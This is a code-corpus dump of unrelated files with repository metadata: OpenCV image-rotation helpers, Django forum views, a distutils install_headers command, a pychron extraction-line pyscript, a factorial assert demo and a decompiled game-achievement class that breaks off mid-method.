    # `scale` is already baked into rotationMat; the original code passed it
    # as warpAffine's 4th positional argument, which is the `dst` output
    # buffer, not a scale -- drop it.
    img = cv2.warpAffine(img, rotationMat, (cols, rows))
    rotateInfo = [angle, cols, rows, im_shape]
    return img, rotateInfo
def rotateImageList(imageList,angle):
    """Rotate every image in ``imageList`` by ``angle`` degrees.

    Accepts either a Python list of images or a stacked ndarray indexed
    along axis 0.  Returns a list of rotated images -- except when a bare
    single image is detected, in which case the rotated image itself is
    returned (NOTE(review): inconsistent return type; confirm callers
    handle both).
    """
    rot_image_list = []
    if type(imageList) is list:
        for image_index,image in enumerate(imageList):
            rot_image,_ = rotateImage(image,angle)
            rot_image_list.append(rot_image)
    else:
        # detect a single image mistakenly passed instead of a batch:
        # 2-D (grayscale) or 3-D ending in 3 channels (color)
        is_single_bw_image_bool = (len(imageList.shape) == 2)
        is_single_color_image_bool = (len(imageList.shape) == 3) and (imageList.shape[2] == 3)
        if is_single_bw_image_bool or is_single_color_image_bool:
            print("actually single image; not list")
            rot_image,_ = rotateImage(imageList,angle)
            return rot_image
        for image_index in range(imageList.shape[0]):
            image = np.squeeze(imageList[image_index,...])
            rot_image,_ = rotateImage(image,angle)
            rot_image_list.append(rot_image)
    return rot_image_list
def saveImageList(imageList, prefix_name="save_image", label_string=None):
    """Write each image to '<prefix>_<i>.png', or '<prefix>_<i>_<label>.png'
    when ``label_string`` supplies per-index labels.

    Accepts a Python list of images or a stacked ndarray indexed along
    axis 0 (ndarray entries are np.squeeze'd before writing).
    """
    def _filename(index):
        # shared name builder; previously duplicated across both branches
        if label_string is not None:
            return "{}_{}_{}.png".format(prefix_name, index, label_string[index])
        return "{}_{}.png".format(prefix_name, index)

    if type(imageList) is list:
        for index, image in enumerate(imageList):
            cv2.imwrite(_filename(index), image)
    else:
        for index in range(imageList.shape[0]):
            cv2.imwrite(_filename(index), np.squeeze(imageList[index]))
| [
"kent.gauen@gmail.com"
] | kent.gauen@gmail.com |
afb8c441118da9ce0c7ceb12fc640da170000a66 | d9e8b7d5c468b38cdf18cece9dff12ad1188a71b | /DiscussionForum/Postapp/views.py | 7cf20fbdb26a0e0028127630d851e46d326f9dac | [] | no_license | Ruchika-Munde/Django_Task | f14e0497a4f8045a68dbe58bbd772abf606369d3 | 7fa549842a544527b9f78cbfcf52c26dde31463c | refs/heads/master | 2022-12-16T17:53:12.577323 | 2020-09-09T07:34:43 | 2020-09-09T07:34:43 | 294,036,604 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,502 | py | from django.shortcuts import render,redirect
from Postapp.forms import Addpostform
from Postapp.models import Post
from django.views import View
from Userapp.models import User
from Commentapp.forms import commentform
from Postapp.decorator import user_login
# Create your views here.
#for add post
class base(View):
    # simple landing view: renders the shared base template
    def get(self,request):
        return render(request,'base.html')
class Addpost(View):
    """Create a new Post: GET renders the form, POST validates and saves.

    NOTE(review): only get() is guarded by @user_login; post() reads
    request.session['uid'] unguarded -- confirm whether post() should also
    require login.
    """
    @user_login
    def get(self,request):
        pform=Addpostform()
        return render (request,'post.html',{'pform':pform})
    def post(self,request,*args,**kwargs):
        pform=Addpostform(request.POST,request.FILES)
        if(pform.is_valid()):
            post=Post(title=pform.cleaned_data['title'],description=pform.cleaned_data['description'],ptag=pform.cleaned_data['ptag'])
            # only attach the upload when a file was actually submitted
            if(request.FILES):
                post.fileupload = pform.cleaned_data['fileupload']
            # author comes from the session set at login
            uid=request.session.get('uid')
            # debug leftover
            print(uid)
            user_obj=User.objects.get(pk=uid)
            post.postbyuser=user_obj
            post.save()
        return redirect('/postapp/showpost/')
# for show post
class posttitle(View):
    """List every post on the home page."""
    def get(self, request):
        all_posts = Post.objects.all()
        return render(request, 'home.html', {'obj': all_posts})
# show post details
class postdetails(View):
    """Render a single post together with an empty comment form."""
    def get(self, request, id):
        post = Post.objects.get(pk=id)
        comment_form = commentform()
        return render(request, 'postdetails.html', {'pobj': post, 'form': comment_form})
| [
"ruchamunde@gmail.com"
] | ruchamunde@gmail.com |
878c2b75897dabb57c8c8b8f229f2b4c3c2fda3e | 7823d31688879b2d4dcfd2e3c11fb2c862f35a23 | /AlexNet/cifar/__init__.py | 0e34a0daf85c1391567619a425f9e1606cb30503 | [] | no_license | FMsunyh/dlfive | 7637631f54520673e4ec417b3c02b5334ecdf026 | ffae48aac5ece4de5ff9afccc69b093a72e09637 | refs/heads/master | 2021-09-19T05:59:51.040214 | 2018-07-24T06:29:40 | 2018-07-24T06:29:40 | 108,929,499 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11/30/2017 10:43 AM
# @Author : sunyonghai
# @File : __init__.py
# @Software: BG_AI
# ========================================================= | [
"fmsunyh@gmail.com"
] | fmsunyh@gmail.com |
cdb285fcbd3bf0997b05842fdf2761137a12425e | cb9a9263e077111a9b2f6fe420438153a2f3f952 | /empiricaldist/__init__.py | 4323a53ba66a6117c76a3c43d918496d41084317 | [
"BSD-3-Clause"
] | permissive | AllenDowney/empiricaldist | 706cab3f556f97d1e3dd5c858d93d8422e799399 | 3df89ba1314a90a6e5515ec6a77dba4d02fa1438 | refs/heads/master | 2023-06-20T19:33:25.551749 | 2023-06-11T00:11:41 | 2023-06-11T00:11:41 | 179,715,194 | 128 | 30 | BSD-3-Clause | 2022-09-02T23:22:05 | 2019-04-05T16:13:21 | Jupyter Notebook | UTF-8 | Python | false | false | 29 | py | from .empiricaldist import *
| [
"downey@allendowney.com"
] | downey@allendowney.com |
497130a66a1d5cb4e762cfd18224838b0a235273 | 3dc647cd07a7361ed401e40d2b7cce8c826c8f6c | /Lib/distutils/command/install_headers.py | 9bb0b18dc0d809dbc03d9ca355818b3bb0af573b | [
"CC-BY-4.0",
"MIT",
"Python-2.0"
] | permissive | RustPython/RustPython | 5ddce4a9848b9de8c041ffd2634f83c0105d3f39 | b864e5da1f18897fc884180b7093df5aa170024f | refs/heads/main | 2023-09-04T12:38:29.458699 | 2023-09-03T12:33:42 | 2023-09-03T12:33:42 | 135,201,145 | 15,815 | 1,302 | MIT | 2023-09-14T08:11:45 | 2018-05-28T19:27:01 | Rust | UTF-8 | Python | false | false | 1,298 | py | """distutils.command.install_headers
Implements the Distutils 'install_headers' command, to install C/C++ header
files to the Python include directory."""
from distutils.core import Command
# XXX force is never used
class install_headers(Command):
    """Distutils command that copies the distribution's declared C/C++
    headers into the Python include directory."""

    description = "install C/C++ header files"
    user_options = [('install-dir=', 'd',
                     "directory to install header files to"),
                    ('force', 'f',
                     "force installation (overwrite existing files)"),
                   ]
    boolean_options = ['force']

    def initialize_options(self):
        # options start unset; finalize_options fills them in
        self.install_dir = None
        self.force = 0
        self.outfiles = []

    def finalize_options(self):
        # inherit install_dir/force from the parent 'install' command
        self.set_undefined_options('install',
                                   ('install_headers', 'install_dir'),
                                   ('force', 'force'))

    def run(self):
        # copy each declared header into install_dir, tracking outputs
        headers = self.distribution.headers
        if not headers:
            return
        self.mkpath(self.install_dir)
        for header in headers:
            (out, _) = self.copy_file(header, self.install_dir)
            self.outfiles.append(out)

    def get_inputs(self):
        return self.distribution.headers or []

    def get_outputs(self):
        return self.outfiles
| [
"33094578+coolreader18@users.noreply.github.com"
] | 33094578+coolreader18@users.noreply.github.com |
b7952897bfe878e35fb9ecdb2fdebc447c5a6b71 | 96c970ebacd9ade1493f4d01537005788b43a49b | /pychron/pyscripts/extraction_line_pyscript.py | 5f8cc3ba8a68016c0e3a052fa639ab93b6d1ecea | [
"Apache-2.0"
] | permissive | OSUPychron/pychron | d2da9051b68024200d0009de634da810ccef2a0d | fe0ba9daff9548fa8bebab26db66a1cefff7c1d6 | refs/heads/master | 2021-01-14T12:47:26.389887 | 2015-12-18T22:27:02 | 2015-12-18T22:27:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,857 | py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import List
# ============= standard library imports ========================
import time
import inspect
import re
# ============= local library imports ==========================
from pychron.core.ramper import Ramper
from pychron.external_pipette.protocol import IPipetteManager
from pychron.hardware.core.exceptions import TimeoutError
from pychron.hardware.core.i_core_device import ICoreDevice
from pychron.pyscripts.pyscript import verbose_skip, makeRegistry
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.pyscripts.valve_pyscript import ValvePyScript
from pychron.pychron_constants import EXTRACTION_COLOR, LINE_STR
# ELPROTOCOL = 'pychron.extraction_line.extraction_line_manager.ExtractionLineManager'
# matches a leading run of ASCII letters (appears unused in this chunk)
COMPRE = re.compile(r'[A-Za-z]*')
# make a registry to hold all the commands exposed by ExtractionPyScript
# used when building the context
# see PyScript.get_context and get_command_register
command_register = makeRegistry()
class RecordingCTX(object):
    """Context manager that brackets a block with start/stop video
    recording on the owning script, e.g.::

        with self.video_recording('myvideo'):
            ...
    """

    def __init__(self, script, name):
        self._script = script
        self._name = name

    def __enter__(self, *args, **kw):
        self._script.start_video_recording(self._name)
        # return self so ``with ... as ctx`` binds the manager
        # (previously it bound None)
        return self

    def __exit__(self, *args, **kw):
        self._script.stop_video_recording()
class ExtractionPyScript(ValvePyScript):
"""
The ExtractionPyScript is used to program the extraction and gettering of
sample gas.
"""
_resource_flag = None
info_color = EXTRACTION_COLOR
snapshots = List
_extraction_positions = List
    def set_run_identifier(self, v):
        # expose the current run id (e.g. '12345-01A') to the script context
        self.setup_context(run_identifier=v)
    def get_extraction_positions(self, clear=True):
        """
        Returns a list of x,y,z tuples; each tuple represents where an
        extraction occurred.
        If clear is True (default) ``self._extraction_positions`` is reset
        to an empty list after being read.
        :return: list of x,y,z tuples
        :rtype: list of tuples
        """
        ret = self._extraction_positions
        if clear:
            self._extraction_positions = []
        return ret
    def get_response_blob(self):
        """
        Get the extraction device's response blob
        :return: response blob. binary string representing time v measured output
        :rtype: str
        """
        return self._extraction_action([('get_response_blob', (), {})])
    def get_output_blob(self):
        """
        Get the extraction device's output blob
        :return: output blob: binary string representing time v requested output
        :rtype: str
        """
        return self._extraction_action([('get_output_blob', (), {})])
def output_achieved(self):
"""
Return a formated string with the extraction "heating" results::
Requested Output= 100.000
Achieved Output= 99.012
:return: Formatted string with results
:rtype: str
"""
request = self.extract
ach = self._extraction_action([('get_achieved_output', (), {})])
try:
request = float(request)
except (ValueError, TypeError):
request = 0
try:
ach = float(ach)
except (ValueError, TypeError):
ach = 0
return ('Requested Output= {:0.3f}'.format(request),
'Achieved Output= {:0.3f}'.format(ach))
    def get_command_register(self):
        # merge this class's registered commands with the base class's
        cm = super(ExtractionPyScript, self).get_command_register()
        return command_register.commands.items() + cm
    def set_default_context(self):
        """
        provide default values for all the properties exposed in the script
        """
        self.setup_context(analysis_type='',
                           position='',
                           pattern='',
                           extract_device='',
                           extract_value=0,
                           extract_units='',
                           tray='',
                           ramp_rate='',
                           ramp_duration=0,
                           duration=0,
                           cleanup=0,
                           beam_diameter=None,
                           run_identifier='default_runid')
    # ===============================================================================
    # commands
    # ===============================================================================
    @verbose_skip
    @command_register
    def wake(self):
        # wake both the extraction device and the manager (e.g. from a
        # screen-saver/sleep state)
        self._extraction_action('wake')
        self._manager_action('wake')
    @verbose_skip
    @command_register
    def waitfor(self, func_or_tuple, start_message='', end_message='',
                check_period=1, timeout=0):
        """
        Block until a condition becomes true.

        tuple format: (device_name, function_name, comparison)
        comparison ::
            x<10
            10<x<20
        callable can be of the form ``func() or func(ti) or func(ti, i)``
        where ``ti`` is the current relative time (relative to start of
        waitfor) and ``i`` is a counter
        :param func_or_tuple: wait for function to return True
        :type func_or_tuple: callable, tuple
        :param start_message: Message to display at start
        :type start_message: str
        :param end_message: Message to display at end
        :type end_message: str
        :param check_period: Delay between checks in seconds
        :type check_period: int, float
        :param timeout: Cancel waiting after ``timeout`` seconds (0 = never)
        :type timeout: int, float
        """
        include_time = False
        include_time_and_count = False
        if isinstance(func_or_tuple, tuple):
            func = self._make_waitfor_func(*func_or_tuple)
        else:
            func = func_or_tuple
            # introspect the callable's arity to decide whether to pass the
            # elapsed time and/or an iteration counter
            args = inspect.getargspec(func).args
            if len(args) == 1:
                include_time = True
            elif len(args) == 2:
                include_time_and_count = True
        # NOTE(review): after cancel() here, execution still falls through
        # into the loop below; is_canceled() is relied on to exit -- confirm
        if not func:
            self.debug('no waitfor function')
            self.cancel()
        self.console_info('waitfor started. {}'.format(start_message))
        st = time.time()
        i = 0
        while 1:
            if self.is_canceled():
                self.console_info('waitfor canceled')
                return
            ct = time.time() - st
            if timeout and ct > timeout:
                self.warning('waitfor timed out after {}s'.format(timeout))
                self.cancel()
                return
            # build the argument tuple matching the callable's arity;
            # the counter only advances in the two-argument mode
            if include_time:
                args = (ct,)
            elif include_time_and_count:
                args = (ct, i)
                i += 1
            else:
                args = tuple()
            if func(*args):
                self.console_info('waitfor ended. {}'.format(end_message))
                break
            time.sleep(check_period)
    @verbose_skip
    @command_register
    def power_map(self, cx, cy, padding, bd, power):
        # placeholder command: power mapping is not implemented here
        pass
    @verbose_skip
    @command_register
    def degas(self, lumens=0, duration=0):
        # machine-vision-controlled degas on the extraction device
        self._extraction_action([('do_machine_vision_degas', (lumens, duration), {})])
    @verbose_skip
    @command_register
    def autofocus(self, set_zoom=True):
        # run the extraction device's autofocus routine
        self._extraction_action([('do_autofocus', (), {'set_zoom': set_zoom})])
    @verbose_skip
    @command_register
    def set_light(self, value=''):
        # set the extraction device's illumination
        self._extraction_action([('set_light', (value,), {})])
    @verbose_skip
    @command_register
    def snapshot(self, name='', prefix='', view_snapshot=False, pic_format='.jpg'):
        """
        Take a snapshot with the extraction device's camera.
        if name not specified use RID_Position e.g 12345-01A_3
        """
        if not name:
            pos = '_'.join(self.position)
            name = '{}_{}'.format(self.run_identifier, pos)
        name = '{}{}'.format(prefix, name)
        # returned snapshot path is accumulated so the run can archive it
        ps = self._extraction_action([('take_snapshot', (name, pic_format),
                                       {'view_snapshot':view_snapshot})])
        if ps:
            self.snapshots.append(ps)
    @command_register
    def video_recording(self, name='video'):
        # context manager: ``with self.video_recording('v'): ...``
        return RecordingCTX(self, name)
    @verbose_skip
    @command_register
    def start_video_recording(self, name='video'):
        self._extraction_action([('start_video_recording', (), {'name': name})])
    @verbose_skip
    @command_register
    def stop_video_recording(self):
        self._extraction_action([('stop_video_recording', (), {})])
    @verbose_skip
    @command_register
    def set_x(self, value, velocity=''):
        # each axis command delegates to the private _set_axis helper
        self._set_axis('x', value, velocity)
    @verbose_skip
    @command_register
    def set_y(self, value, velocity=''):
        self._set_axis('y', value, velocity)
    @verbose_skip
    @command_register
    def set_z(self, value, velocity=''):
        self._set_axis('z', value, velocity)
    @verbose_skip
    @command_register
    def set_xy(self, value, velocity=''):
        self._set_axis('xy', value, velocity)
@verbose_skip
@command_register
def set_motor_lock(self, name='', value=''):
if name and value is not '':
l = 'YES' if value else 'NO'
self.console_info('set motor lock to {}'.format(name, l))
self._extraction_action([('set_motor_lock', (name, value), {})])
@verbose_skip
@command_register
def set_motor(self, name='', value=''):
self.console_info('setting motor "{}" to {}'.format(name, value))
if name is not '' and value is not '':
if value is not None:
self._extraction_action([('set_motor', (name, value), {})])
@verbose_skip
@command_register
def get_value(self, name):
try:
print name, self.get_context()[name]
return self.get_context()[name]
except KeyError:
self.warning('no name {} in context'.format(name))
pass
    @verbose_skip
    @command_register
    def move_to_position(self, position='', autocenter=False):
        """Move the extraction device to ``position`` (defaults to the
        context's position); cancels the script when the move fails."""
        if position == '':
            position = self.position
        if position:
            position_ok = True
            # a list/tuple position requires every component to be truthy
            if isinstance(position, (list, tuple)):
                position_ok = all(position)
        else:
            position_ok = False
        if position_ok:
            self.console_info('{} move to position {}'.format(self.extract_device,
                                                              position))
            success = self._extraction_action([('move_to_position',
                                                (position, autocenter), {})])
            if not success:
                self.info('{} move to position failed'.format(self.extract_device))
                self.cancel()
            else:
                self.console_info('move to position suceeded')
                return True
        else:
            self.console_info('move not required. position is None')
            return True
    @verbose_skip
    @command_register
    def execute_pattern(self, pattern='', block=True):
        """Run a laser pattern; returns the elapsed wall time in seconds."""
        if pattern == '':
            pattern = self.pattern
        st = time.time()
        # set block=True to wait for pattern completion
        self._extraction_action([('execute_pattern', (pattern,), {'block': block})])
        return time.time() - st
    @verbose_skip
    @command_register
    def set_tray(self, tray=''):
        """Select the stage map (sample tray) on the extraction device."""
        if tray == '':
            tray = self.tray
        self.console_info('set tray to {}'.format(tray))
        result = self._extraction_action([('set_stage_map', (tray,), {})])
        return result
    @verbose_skip
    @command_register
    def load_pipette(self, identifier, timeout=300):
        """
        this is a non blocking command. it simply sends a command to apis to
        start one of its runscripts.
        it is the ExtractionPyScript's responsibility to handle the waiting.
        use the waitfor command to wait for signals from apis.
        """
        from pychron.external_pipette.apis_manager import InvalidPipetteError
        # blanks use a different APIS runscript than samples
        cmd = 'load_blank_non_blocking' if self.analysis_type == 'blank' else 'load_pipette_non_blocking'
        try:
            #bug _manager_action only with except tuple of len 1 for args
            rets = self._extraction_action([(cmd, (identifier,),
                                            # {'timeout': timeout, 'script': self})],
                                            {'timeout': timeout, })],
                                           name='externalpipette',
                                           protocol=IPipetteManager)
            return rets[0]
        except InvalidPipetteError, e:
            # cancel the run and surface the error message to the caller
            self.cancel(protocol=IPipetteManager)
            e = str(e)
            self.warning(e)
            return e
@verbose_skip
@command_register
def extract_pipette(self, identifier='', timeout=300):
"""
this is an atomic command. use the apis_controller config file to define
the isolation procedures.
"""
from pychron.external_pipette.apis_manager import InvalidPipetteError
if identifier == '':
identifier = self.extract_value
cmd = 'load_blank' if self.analysis_type == 'blank' else 'load_pipette'
try:
#bug _manager_action only with except tuple of len 1 for args
rets = self._extraction_action([(cmd, (identifier,),
{'timeout': timeout, 'script': self})],
name='externalpipette',
protocol=IPipetteManager)
return rets[0]
except (TimeoutError, InvalidPipetteError), e:
self.cancel(protocol=IPipetteManager)
e = str(e)
self.warning(e)
return e
@verbose_skip
@command_register
def extract(self, power='', units=''):
    """Heat/extract the sample at ``power`` (in ``units``).

    Records the current stage position and updates the experiment
    executor's state display before firing.
    """
    if power == '':
        power = self.extract_value
    if units == '':
        units = self.extract_units

    ed = self.extract_device
    ed = ed.replace('_', ' ')

    # get current position and add as an extraction position
    pos = self._extraction_action([('get_position', (), {})])
    self._extraction_positions.append(pos)

    # set an experiment message
    if self.manager:
        self.manager.set_extract_state('{} ON! {}({})'.format(ed, power, units), color='red')

    self.console_info('extract sample to {} ({})'.format(power, units))
    self._extraction_action([('extract', (power,), {'units': units})])

@verbose_skip
@command_register
def end_extract(self):
    """Stop the extraction (heating) phase on the device."""
    self._extraction_action([('end_extract', (), {})])

@verbose_skip
@command_register
def fire_laser(self):
    """Fire the laser at the currently configured settings."""
    self._extraction_action([('fire_laser', (), {})])

@verbose_skip
@command_register
def ramp(self, start=0, setpoint=0, duration=0, rate=0, period=1):
    """Ramp laser power from ``start`` to ``setpoint``.

    ``duration`` or ``rate`` defines the profile; ``period`` is the step
    interval.  Returns the elapsed time in seconds.
    """
    self.debug('ramp parameters start={}, '
               'setpoint={}, duration={}, rate={}, period={}'.format(start, setpoint, duration, rate, period))

    def func(i, ramp_step):
        # per-step callback: abort on cancellation or a failed power set
        if self._cancel:
            return

        self.console_info('ramp step {}. setpoint={}'.format(i, ramp_step))
        if not self._extraction_action([('set_laser_power', (ramp_step,), {})]):
            return

        if self._cancel:
            return

        return True

    st = time.time()
    rmp = Ramper()
    rmp.ramp(func, start, setpoint, duration, rate, period)
    return time.time() - st
@verbose_skip
@command_register
def acquire(self, name=None, clear=False):
    """Acquire exclusive access to the named shared resource.

    Blocks (polling once per second) while another script holds the
    resource, unless ``clear`` is set.
    """
    if self.runner is None:
        self.debug('+++++++++++++++++++++++ Runner is None')
        return

    self.console_info('acquire {}'.format(name))
    self.runner.connect()

    r = self.runner.get_resource(name)

    if not clear:
        if r.isSet():
            self.console_info('waiting for access')
            if self.manager:
                self.manager.set_extract_state('Waiting for Resource Access. "{}"'.format(name), color='red')

            while r.isSet():
                if self._cancel:
                    break
                self._sleep(1)
                # a dropped connection would make isSet() stale forever
                if not self.runner.reset_connection():
                    self.cancel()
                    break

    if not self._cancel:
        # remember the flag so _cancel_hook can release it
        self._resource_flag = r
        r.set()
        self.console_info('{} acquired'.format(name))

    if self.manager:
        self.manager.set_extract_state(False)

@verbose_skip
@command_register
def wait(self, name=None, criterion=0):
    """Poll the named resource until its value equals ``criterion``."""
    if self.runner is None:
        self.debug('+++++++++++++++++++++++ Runner is None')
        return

    self.console_info('waiting for {} = {}'.format(name, criterion))
    r = self.runner.get_resource(name)

    cnt = 0
    resp = r.read()
    if resp is not None:
        while resp != criterion:
            time.sleep(1)

            # only verbose every 10s
            resp = r.read(verbose=cnt % 10 == 0)
            if resp is None:
                continue
            cnt += 1
            if cnt > 100:
                cnt = 0

    self.console_info('finished waiting')
@verbose_skip
@command_register
def release(self, name=None):
    """Release (clear) the named shared resource."""
    self.console_info('release {}'.format(name))
    if self.runner is None:
        self.debug('+++++++++++++++++++++++ Runner is None')
        return

    r = self.runner.get_resource(name)
    if r is not None:
        r.clear()
    else:
        self.console_info('Could not release {}'.format(name))

@verbose_skip
@command_register
def set_resource(self, name=None, value=1):
    """Set the named shared resource to ``value``."""
    if self.runner is None:
        self.debug('+++++++++++++++++++++++ Runner is None')
        return

    r = self.runner.get_resource(name)
    if r is not None:
        r.set(value)
    else:
        self.console_info('Could not set {}'.format(name))

@verbose_skip
@command_register
def get_resource_value(self, name=None):
    """Return the current value (or set-state) of the named resource."""
    if self.runner is None:
        self.debug('+++++++++++++++++++++++ Runner is None')
        return

    r = self.runner.get_resource(name)
    resp = None
    if r is not None:
        # value-style resources expose get(); flag-style ones only isSet()
        if hasattr(r, 'get'):
            resp = r.get()
        else:
            resp = r.isSet()
    else:
        self.console_info('Could not get {}'.format(name))

    self.debug('Get Resource Value {}={}'.format(name, resp))
    return resp
@verbose_skip
@command_register
def enable(self):
    """Enable the extraction device (e.g. arm the laser)."""
    ed = self.extract_device
    ed = ed.replace('_', ' ')
    self.manager.set_extract_state('{} Enabled'.format(ed))

    return self._manager_action([('enable_device', (), {})],
                                protocol=ILaserManager,
                                name=self.extract_device)

@verbose_skip
@command_register
def disable(self):
    """Disable the extraction device."""
    return self._disable()

@verbose_skip
@command_register
def prepare(self):
    """Run the extraction device's prepare procedure."""
    return self._extraction_action([('prepare', (), {})])

# ===============================================================================
# properties
# ===============================================================================
def _get_property(self, key, default=None):
    # thin helper: look up ``key`` in the script context
    ctx = self.get_context()
    return ctx.get(key, default)
# read-only views onto the script context ------------------------------
@property
def duration(self):
    return self._get_property('duration')
    # return self.get_context()['duration']

@property
def cleanup(self):
    return self._get_property('cleanup')
    # return self.get_context()['cleanup']

@property
def pattern(self):
    return self._get_property('pattern')
    # return self.get_context()['pattern']

@property
def analysis_type(self):
    at = self._get_property('analysis_type')
    self.debug('getting analysis type for {}. '
               'analysis_type={}'.format(self.run_identifier, at))
    return at
    # return self.get_context()['analysis_type']

@property
def extract_device(self):
    return self._get_property('extract_device')
    # return self.get_context()['extract_device']

@property
def tray(self):
    return self._get_property('tray')
    # return self.get_context()['tray']

@property
def position(self):
    """
    if position is 0 return None
    """
    # pos = self.get_context()['position']
    pos = self._get_property('position')
    if pos:
        return pos

@property
def extract_value(self):
    return self._get_property('extract_value')
    # return self.get_context()['extract_value']

@property
def extract_units(self):
    return self._get_property('extract_units')
    # return self.get_context()['extract_units']

@property
def beam_diameter(self):
    return self._get_property('beam_diameter')
    # return self.get_context()['beam_diameter']

@property
def run_identifier(self):
    return self._get_property('run_identifier')
# ===============================================================================
# private
# ===============================================================================
def _abort_hook(self):
    # ensure the device is off when the script is aborted
    self.disable()

def _cancel_hook(self):
    # NOTE(review): shadowed by a later _cancel_hook definition below —
    # confirm which one is intended
    self.disable()

def _get_device(self, name):
    """Look up an ICoreDevice service by name from the application."""
    app = self._get_application()
    if app is not None:
        return app.get_service_by_name(ICoreDevice, name)
    else:
        self.warning('_get_device - No application')

def _make_waitfor_func(self, name, funcname, comp):
    """Build a predicate that evaluates ``comp`` against a device reading.

    ``comp`` is an expression such as ``'x<10'``; the single variable it
    names is bound to ``getattr(device, funcname)()`` on each call.
    """
    dev = self._get_device(name)
    if dev:
        devfunc = getattr(dev, funcname)
        m = COMPRE.findall(comp)
        if m:
            k = m[0]

            # SECURITY NOTE: comp comes from the user's pyscript and is
            # eval'd; acceptable only because scripts are trusted input
            def func(*args):
                return eval(comp, {k: devfunc()})

            return func
        else:
            self.warning('invalid comparison. valid e.g.=x<10 comp={}'.format(comp))
    else:
        self.warning('no device available named "{}"'.format(name))
def _extraction_action(self, *args, **kw):
    """Forward an action to the extraction device manager.

    Fills in default ``name``/``protocol`` keywords and short-circuits
    when no real extraction device is configured.
    """
    # A missing, None or empty name falls back to the extract device.
    # (The original first set the key only when absent, then immediately
    # recomputed it unconditionally — that dead branch is removed; the
    # single expression below is behaviorally identical.)
    kw['name'] = kw.get('name') or self.extract_device
    if kw['name'] in ('Extract Device', LINE_STR):
        # placeholder entries mean "no extraction device configured"
        return

    # a missing or falsy protocol falls back to ILaserManager
    kw['protocol'] = kw.get('protocol') or ILaserManager
    return self._manager_action(*args, **kw)
def _disable(self, protocol=None):
    """Turn the device off and clear the executor's extract indicator."""
    self.debug('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% disable')
    if self.manager:
        self.manager.set_extract_state(False)

    return self._extraction_action([('disable_device', (), {})], protocol=protocol)
def _set_axis(self, name, value, velocity):
    """Move stage axis ``name`` to ``value``, blocking until done.

    ``velocity`` optionally overrides the axis speed.  Returns True on
    success.
    """
    kw = dict(block=True)
    if velocity:
        # BUGFIX: previously assigned ``value`` (the target position)
        # as the velocity
        kw['velocity'] = velocity

    success = self._extraction_action([('set_{}'.format(name), (value,), kw)])
    if not success:
        self.console_info('{} move to position failed'.format(self.extract_device))
    else:
        self.console_info('move to position suceeded')
        return True
def _cancel_hook(self, **kw):
    # NOTE(review): this redefines _cancel_hook (also defined earlier in
    # this chunk without kwargs); in Python the later definition wins —
    # confirm which is intended
    if self._resource_flag:
        # release any shared resource this script acquired
        self._resource_flag.clear()

    # disable the extract device
    self._disable(**kw)

    # stop patterning
    self._stop_pattern(**kw)

def _stop_pattern(self, protocol=None):
    # best-effort stop of any running laser pattern
    self._extraction_action([('stop_pattern', (), {})], protocol=protocol)
# ============= EOF ==================================== | [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
5f51abe52378a636ea41db4efa51780a173e9ad5 | 6b265b404d74b09e1b1e3710e8ea872cd50f4263 | /Python/CodeTesting/Asserts/fac.py | 7572aa64bddf2acdd30e38c0485814ca7db55178 | [
"CC-BY-4.0"
] | permissive | gjbex/training-material | cdc189469ae2c7d43784ecdcb4bcca10ecbc21ae | e748466a2af9f3388a8b0ed091aa061dbfc752d6 | refs/heads/master | 2023-08-17T11:02:27.322865 | 2023-04-27T14:42:55 | 2023-04-27T14:42:55 | 18,587,808 | 130 | 60 | CC-BY-4.0 | 2023-08-03T07:07:25 | 2014-04-09T06:35:58 | Jupyter Notebook | UTF-8 | Python | false | false | 539 | py | #!/usr/bin/env python
def fac(n):
    '''Compute the factorial of the given non-negative integer.

    Raises AssertionError for non-int or negative arguments (this module
    deliberately demonstrates assert-based validation).
    '''
    # isinstance is the idiomatic type check; still rejects floats like 3.0
    assert isinstance(n, int), 'argument must be integer'
    assert n >= 0, 'argument must be positive'
    # iterative form avoids hitting the recursion limit for large n
    result = 1
    for i in range(2, n + 1):
        result *= i
    return result
if __name__ == '__main__':
    # demo: valid inputs compute normally
    for i in range(5):
        print('{0}! = {1}'.format(i, fac(i)))
    # demo: invalid inputs trip the asserts and are reported
    for i in [-2, 0.3, 3.0]:
        try:
            print('{0}! = {1}'.format(i, fac(i)))
        except AssertionError as error:
            print('{0}! failed: "{1}"'.format(i, error))
| [
"geertjan.bex@uhasselt.be"
] | geertjan.bex@uhasselt.be |
90e80b34f6a4d3649a476769aa02209fa9c279ee | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res/scripts/client/gui/shared/gui_items/dossier/achievements/strategicoperationsachievement.py | e881003ec46abf209367c8d18f410da809eed7fb | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,075 | py | # 2015.11.10 21:29:19 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/StrategicOperationsAchievement.py
from abstract import ClassProgressAchievement
from dossiers2.ui.achievements import ACHIEVEMENT_BLOCK as _AB
class StrategicOperationsAchievement(ClassProgressAchievement):
    """'Strategic Operations' class-progress achievement (rated 7x7 block)."""

    def __init__(self, dossier, value = None):
        super(StrategicOperationsAchievement, self).__init__('strategicOperations', _AB.RATED_7X7, dossier, value)

    def getNextLevelInfo(self):
        # wins still needed to reach the next achievement level
        return ('winsLeft', self._lvlUpValue)

    def _readProgressValue(self, dossier):
